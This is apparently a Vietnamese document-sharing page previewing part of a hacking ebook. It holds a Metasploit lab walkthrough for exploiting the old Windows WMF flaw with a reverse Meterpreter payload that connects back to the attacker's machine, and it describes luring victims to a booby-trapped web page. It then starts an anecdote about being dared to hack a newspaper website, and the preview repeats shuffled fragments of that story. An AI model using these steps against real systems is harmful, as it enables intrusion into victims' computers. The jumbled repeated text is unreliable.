Hacker Professional Ebook part 198 pdf

6 154 0
Hacker Professional Ebook part 198 pdf

Đang tải... (xem toàn văn)

Thông tin tài liệu

3. Dùng IP Angry Scan để kiểm tra lại mô hình LAB gồm 2 máy Attacker Machine 192.168.1.114 và Victim Machin 192.168.1.113 4. Kiểm tra đã có exploit code của lỗi bảo mật WMF hay chưa với lệnh show exploit từ cữa sổ MSF console, sau đó chọn exploit code này (ie_xp_pfv_metafile) 5.Để biết 1 exploit code cần phải có những option nào các bạn có thể chạy show options sau khi đã chọn exploit code: Như vậy, với mã khai thác trên các bạn cần phải xác định HTTPPORT (đã được chọn default là 8080). Cần phải xác định thêm HTTPHOST (là địa chỉ của attacker machine, máy dùng để tiến hành penetrating, và chạy MSF. Trong trường hợp này là 192.168.1.114. Hãy dùng lệnh set HTTPPORT 192.168.1.114 và tiếp theo là chọn Payload (đọan code sẽ được thực thi trên Victimmachine khi quá trình exploit thành công). Dùng lệng set PAYLOAD win32_reverse_meterpreter như hình đưới đây: 6. Tiếp tục chạy show options để xác định các tham số cần thiết cho Payload được chọn, ta thấy có 2 tham số còn thiếu cần xác định là LHOST (192.168.1.114) và LPORT (443) OK. Như vậy là đã đủ các tham số cần thiết cho quá trình exploit, chúng ta cần lưu ý đây là quá trình exploit lỗi bảomật này là gián tiếp, vì vậy các attacker sẽ nhúng code khai thác vào trang web và dụ victim truy cập vào những trang web này (ở đây chúng ta tiến hành Hack My Self nên sẽ truy cập trực tiếp và Server có nhúng mã exploit là 192.168.1.114, trong phần 2 chúng ta sẽ bàn đến quá trình nhúng code). Các bạn hãy chậy lệnh exploit: Ở đây tôi dùng Dameware Remote Control (một chương trình rất hay cho phép quản lý các client mà không cần cài đặt trước) để điều khiển máy 113: Sau đó mở trình duyệt web và kết nối đến http://192.168.3.14:8080/anythinh.wmf Các bước tiếp theo các bạn tham khảo file demo để nạp dll lên máy 192.168.3.113 NTTA copyright by security365 Các bước Hack Server Một ngày tối trời đầu tháng 8 năm ngoái, đang ngồi trong phòng làm việc ở tòa soạn Tuổi Trẻ, bất chợt có người bước vào, àh thì ra là sếp phó tổng biên tập, đi cùng với sếp còn có hai ba người khác nữa, nghe nói là đồng nghiệp bên báo Sài Gòn Giải Phóng sang chơi. "Nè giới thiệu với các anh, hacker của Tuổi Trẻ nè", vừa nói sếp vừa chỉ thẳng vô mình. Trời ơi, ngại muốn chết! Từ trước tới giờ, thằng mrro sợ nhất 2 chuyện (1) ai đó hỏi "eh biết hack Yahoo! Mail hông?" (2) bị người ta kêu là hacker. Thời buổi gì không biết, *hacker* còn quí hơn vàng , mới nghe nhắc tới chữ *hacker*, một ông bên SGGP đã nhảy vào bá vai, nhìn chằm chằm vào mặt thằng mrro (coi coi nó giống người không?! ). "Chắc lại sắp kêu hack cái này cái nọ nữa rồi nè", thằng mrro thầm chửi rủa. Y như rằng: - Hacker hả? Bữa nào thử hack cái www.sggp.org.vn xem, cứ hack thoải mái đi, phá cho hư cũng được, hihi, bên anh cũng đang muốn làm lại cái website đó. Ba nhà báo vừa nói vừa cười nham nhở. -Trời ơi, đừng nghe sếp em nói, em có biết hack hiếc gì đâu. Thằng mrro ấp úng trả lời. -Ừh nói chơi thôi, dân amatuer làm sao hack nổi, cái website của SGGP là do bên VDC làm đấy nhé, chuyên nghiệp cực kì, mấy chú bên đó xây 3-4 cái gì, cái gì, àh nhớ rồi bức tường lửa , bảo mật cực kì, từ trước giờ chưa bao giờ bị tấn công gì . hack Yahoo! Mail hông?" (2) bị người ta kêu là hacker. Thời buổi gì không biết, *hacker* còn quí hơn vàng , mới nghe nhắc tới chữ *hacker* , một ông bên SGGP đã nhảy vào bá vai, nhìn chằm. nghe nói là đồng nghiệp bên báo Sài Gòn Giải Phóng sang chơi. "Nè giới thiệu với các anh, hacker của Tuổi Trẻ nè", vừa nói sếp vừa chỉ thẳng vô mình. Trời ơi, ngại muốn chết! Từ trước. "Chắc lại sắp kêu hack cái này cái nọ nữa rồi nè", thằng mrro thầm chửi rủa. Y như rằng: - Hacker hả? Bữa nào thử hack cái www.sggp.org.vn xem, cứ hack thoải mái đi, phá cho hư cũng được,

Ngày đăng: 04/07/2014, 12:20

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan